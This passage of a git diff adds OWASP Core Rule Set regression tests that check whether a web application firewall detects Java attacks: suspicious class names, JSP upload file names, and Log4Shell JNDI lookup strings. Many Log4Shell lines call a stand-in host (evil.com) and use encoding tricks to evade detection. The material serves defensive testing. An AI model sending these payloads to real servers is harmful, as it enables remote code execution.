javax.script.ScriptEngineManager" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-392 + desc: "XML element value includes keyword javax.script.ScriptEngineManager" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "javax.script.ScriptEngineManager" + output: + log_contains: "id \"944130\"" + - test_title: 944130-393 + desc: "Nested XML element value includes keyword javax.script.ScriptEngineManager" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "javax.script.ScriptEngineManager" + output: + log_contains: "id \"944130\"" + - test_title: 944130-394 + desc: "Content-Type text/plain includes keyword javax.script.ScriptEngineManager" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=javax.script.ScriptEngineManager" + output: + log_contains: "id \"944130\"" + - test_title: 944130-395 + desc: "Content-Type application/json arg value includes keyword javax.script.ScriptEngineManager" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"javax.script.ScriptEngineManager\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-396 + desc: "Content-Type application/json arg name includes keyword javax.script.ScriptEngineManager" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"javax.script.ScriptEngineManager\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-397 + desc: "Argument test includes keyword org.apache.commons" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=org.apache.commons" + output: + log_contains: "id \"944130\"" + - test_title: 944130-398 + desc: "Argument name includes keyword org.apache.commons" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "org.apache.commons=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-399 + desc: "Cookie test includes keyword org.apache.commons" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=org.apache.commons + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-400 + desc: "Cookie name includes keyword org.apache.commons" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: org.apache.commons=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-401 + desc: "Request header test includes keyword org.apache.commons" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: org.apache.commons + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-402 + desc: "XML attribute value includes keyword org.apache.commons" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-403 + desc: "XML element value includes keyword org.apache.commons" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "org.apache.commons" + output: + log_contains: "id \"944130\"" + - test_title: 944130-404 + desc: "Nested XML element value includes keyword org.apache.commons" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "org.apache.commons" + output: + log_contains: "id \"944130\"" + - test_title: 944130-405 + desc: "Content-Type text/plain includes keyword org.apache.commons" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=org.apache.commons" + output: + log_contains: "id \"944130\"" + - test_title: 944130-406 + desc: "Content-Type application/json arg value includes keyword org.apache.commons" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"org.apache.commons\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-407 + desc: "Content-Type application/json arg name includes keyword org.apache.commons" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"org.apache.commons\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-408 + desc: "Argument test includes keyword org.omg.CORBA" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=org.omg.CORBA" + output: + log_contains: "id \"944130\"" + - test_title: 944130-409 + desc: "Argument name includes keyword org.omg.CORBA" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "org.omg.CORBA=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-410 + desc: "Cookie test includes keyword org.omg.CORBA" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=org.omg.CORBA + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-411 + desc: "Cookie name includes keyword org.omg.CORBA" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: org.omg.CORBA=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-412 + desc: "Request header test includes keyword org.omg.CORBA" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: org.omg.CORBA + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-413 + desc: "XML attribute value includes keyword org.omg.CORBA" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-414 + desc: "XML element value includes keyword org.omg.CORBA" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "org.omg.CORBA" + output: + log_contains: "id \"944130\"" + - test_title: 944130-415 + desc: "Nested XML element value includes keyword org.omg.CORBA" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "org.omg.CORBA" + output: + log_contains: "id \"944130\"" + - test_title: 944130-416 + desc: "Content-Type text/plain includes keyword org.omg.CORBA" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=org.omg.CORBA" + output: + log_contains: "id \"944130\"" + - test_title: 944130-417 + desc: "Content-Type application/json arg value includes keyword org.omg.CORBA" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"org.omg.CORBA\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-418 + desc: "Content-Type application/json arg name includes keyword org.omg.CORBA" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"org.omg.CORBA\": \"test\"}" + output: + log_contains: "id \"944130\"" diff --git a/nginx/config/owasp-crs/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944140.yaml b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944140.yaml new file mode 100644 index 00000000..94fa1197 --- /dev/null +++ b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944140.yaml @@ -0,0 +1,141 @@ +--- +meta: + author: lifeforms + description: None + enabled: true + name: 944140.yaml +tests: + - test_title: 944140-1 + desc: Java script uploads + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + uri: / + output: + no_log_contains: id "944140" + - test_title: 944140-2 + desc: Java script uploads + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + X-Filename: a.jsp + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + uri: /upload1 + output: + log_contains: id "944140" + - test_title: 944140-3 + desc: Java script uploads + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + X_Filename: B.jsp + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + uri: /upload2 + output: + log_contains: id "944140" + - test_title: 944140-4 + desc: Java script uploads + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + X-File-Name: a.jspx + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + uri: /upload3 + output: + log_contains: id "944140" + - test_title: 944140-5 + desc: Java script uploads + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + X-Filename: a.jsp.. + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + uri: /upload4 + output: + log_contains: id "944140" + - test_title: 944140-6 + desc: Java script uploads + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + X-Filename: a.jspx.. + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + uri: /upload + output: + log_contains: id "944140" + - test_title: 944140-7 + desc: Java script uploads + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + X-File-Name: foo.jspx... + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + uri: /upload + output: + log_contains: id "944140" + - test_title: 944140-8 + desc: Java script uploads + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + X_Filename: foo.jspx. + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + uri: /upload7 + output: + log_contains: id "944140" + - test_title: 944140-9 + desc: Java script uploads + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + X-File-Name: foo.html + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + uri: /upload8 + output: + no_log_contains: id "944140" diff --git a/nginx/config/owasp-crs/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944150.yaml b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944150.yaml new file mode 100644 index 00000000..d40081da --- /dev/null +++ b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944150.yaml @@ -0,0 +1,414 @@ +--- +# NOTE: Please keep these tests in sync with 944151.yaml. +# 944151 should detect the same things as 944150. +meta: + author: "dune73, Max Leske" + enabled: true + name: "944150.yaml" + description: "Description" +tests: + - test_title: 944150-1 + desc: Log4J exploit on arg foo + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: ModSecurity CRS 3 Tests + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: / + data: foo=${jndi:ldap://evil.com/webshell} + output: + log_contains: id "944150" + - test_title: 944150-2 + desc: Log4J exploit on User-Agent + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: ModSecurity CRS 3 Tests ${jndi:ldap://evil.com/webshell} + method: GET + port: 80 + uri: / + output: + log_contains: id "944150" + - test_title: 944150-3 + desc: Log4J exploit in XML code + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: ModSecurity CRS 3 Tests + Content-Type: application/xml + method: POST + port: 80 + uri: / + data: + output: + log_contains: id "944150" + - test_title: 944150-4 + desc: Log4J exploit in XML code + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: ModSecurity CRS 3 Tests + Content-Type: application/xml + method: POST + port: 80 + uri: / + data: "${jndi:ldap://evil.com/webshell}" + output: + log_contains: id "944150" + - test_title: 944150-5 + desc: Log4J exploit on arg foo, with evasion + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: ModSecurity CRS 3 Tests + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: / + data: foo=${${env:FOO:-j}ndi:ldap://evil.com/webshell} + output: + log_contains: id "944150" + - test_title: 944150-6 + desc: Log4J exploit on arg foo, with evasion + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: ModSecurity CRS 3 Tests + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: / + data: foo=${${::-j}${::-n}${::-d}${::-i}:ldap://evil.com/webshell} + output: + log_contains: id "944150" + - test_title: 944150-7 + desc: Log4J exploit on arg foo, with evasion + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: ModSecurity CRS 3 Tests + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: / + data: foo=$${env:something:-${env:something:-$}{jndi:ldap://evil.com/webshell}}} + output: + log_contains: id "944150" + - test_title: 944150-8 + desc: Log4J exploit on arg foo, with Unicode escape encoding evasion + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: ModSecurity CRS 3 Tests + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: / + data: foo=$\u007Bjndi:ldap://evil.com/webshell} + output: + log_contains: id "944150" + - test_title: 944150-9 + desc: Log4J exploit on JSON with URL encoding evasion + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: ModSecurity CRS 3 Tests + Content-Type: application/json + method: POST + port: 80 + uri: / + data: '{"foo": "%24%7Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' + output: + log_contains: id "944150" + - test_title: 944150-10 + desc: Log4J exploit on JSON with Unicode escape evasion, uppercase + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: ModSecurity CRS 3 Tests + Content-Type: application/json + method: POST + port: 80 + uri: / + data: '{"foo": "$\u007Bjndi:ldap://evil.com/webshell}"}' + output: + log_contains: id "944150" + - test_title: 944150-11 + desc: Log4J exploit on JSON with Unicode escape evasion, lowercase + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: ModSecurity CRS 3 Tests + Content-Type: application/json + method: POST + port: 80 + uri: / + data: '{"foo": "$\u007bjndi:ldap://evil.com/webshell}"}' + output: + log_contains: id "944150" + - test_title: 944150-12 + desc: Log4J exploit on JSON with named HTML entity evasion, lower case + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: ModSecurity CRS 3 Tests + Content-Type: application/json + method: POST + port: 80 + uri: / + data: '{"foo": "${jndi:ldap://evil.com/webshell}"}' + output: + log_contains: id "944150" + - test_title: 944150-13 + desc: Log4J exploit on JSON with named HTML entity evasion, upper case + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: ModSecurity CRS 3 Tests + Content-Type: application/json + method: POST + port: 80 + uri: / + data: '{"foo": "$&LBRACE;jndi:ldap://evil.com/webshell}"}' + output: + log_contains: id "944150" + - test_title: 944150-14 + desc: Log4J exploit on JSON with numeric HTML entity evasion + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: ModSecurity CRS 3 Tests + Content-Type: application/json + method: POST + port: 80 + uri: / + data: '{"foo": "${jndi:ldap://evil.com/webshell}"}' + output: + log_contains: id "944150" + - test_title: 944150-15 + desc: Log4J exploit on JSON with Unicode escape evasion, wrapped in URL encoding evasion + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: ModSecurity CRS 3 Tests + Content-Type: application/json + method: POST + port: 80 + uri: / + data: '{"foo": "%24%5Cu007Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' + output: + log_contains: id "944150" + - test_title: 944150-16 + desc: Log4J exploit on JSON with URL encoding evasion, wrapped in Unicode escape evasion + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: ModSecurity CRS 3 Tests + Content-Type: application/json + method: POST + port: 80 + uri: / + data: '{"foo": "\u002524%7Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' + output: + log_contains: id "944150" + - test_title: 944150-17 + desc: Log4J exploit on JSON with URL encoding evasion, mixed with Unicode escape evasion + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: ModSecurity CRS 3 Tests + Content-Type: application/json + method: POST + port: 80 + uri: / + data: '{"foo": "%24\u007Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' + output: + log_contains: id "944150" + - test_title: 944150-18 + desc: Log4J exploit on JSON with named HTML entity evasion wrapped in URL encoding evasion + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: ModSecurity CRS 3 Tests + Content-Type: application/json + method: POST + port: 80 + uri: / + data: '{"foo": "%24%26lbrace%3Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' + output: + log_contains: id "944150" + - test_title: 944150-19 + desc: Log4J exploit on JSON with numeric HTML entity evasion wrapped in URL encoding evasion + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: ModSecurity CRS 3 Tests + Content-Type: application/json + method: POST + port: 80 + uri: / + data: '{"foo": "%26%2336%3B%7Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' + output: + log_contains: id "944150" + - test_title: 944150-20 + desc: Log4J exploit on JSON with named HTML entity evasion, wrapped in Unicode escape evasion + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: ModSecurity CRS 3 Tests + Content-Type: application/json + method: POST + port: 80 + uri: / + data: '{"foo": "$\u0026lbrace;jndi:ldap://evil.com/webshell}"}' + output: + log_contains: id "944150" + - test_title: 944150-21 + desc: Log4J exploit on JSON with numeric HTML entity evasion, wrapped in Unicode escape evasion + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: ModSecurity CRS 3 Tests + Content-Type: application/json + method: POST + port: 80 + uri: / + data: '{"foo": "$\u0026#123;jndi:ldap://evil.com/webshell}"}' + output: + log_contains: id "944150" + - test_title: 944150-22 + desc: Log4J exploit on JSON with named and numeric HTML entity evasion, mixed with unicode escape evasion and URL encoding evasion + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: ModSecurity CRS 3 Tests + Content-Type: application/json + method: POST + port: 80 + uri: / + data: '{"foo": "%24{\u006Andi:ldap://evil.com/webshell}"}' + output: + log_contains: id "944150" + - test_title: 944150-23 + desc: Log4J exploit on User-Agent header which is known to work against org.apache.commons:commons-text:1.9 + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: '${jndi:ldap://evil.om/w}' + Content-Type: text/html + method: GET + port: 80 + uri: / + output: + log_contains: id "944150" + - test_title: 944150-24 + desc: Log4J exploit on JSON with named HTML entity evasion, wrapped in Unicode escape evasion, omitting terminal semi-colon + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: ModSecurity CRS 3 Tests + Content-Type: application/json + method: POST + port: 80 + uri: / + data: '{"foo": "$\u0026lbracejndi:ldap://evil.com/webshell}"}' + output: + log_contains: id "944150" diff --git a/nginx/config/owasp-crs/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944151.yaml b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944151.yaml new file mode 100644 index 00000000..20b0f620 --- /dev/null +++ b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944151.yaml @@ -0,0 +1,431 @@ +--- +# NOTE: Please keep these tests in sync with 944151.yaml. +# 944151 should detect the same things as 944151. +meta: + author: "dune73, Max Leske" + enabled: true + name: "944151.yaml" + description: "Description" +tests: + - test_title: 944151-1 + desc: Log4J exploit on arg foo + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: ModSecurity CRS 3 Tests + Content-Type: 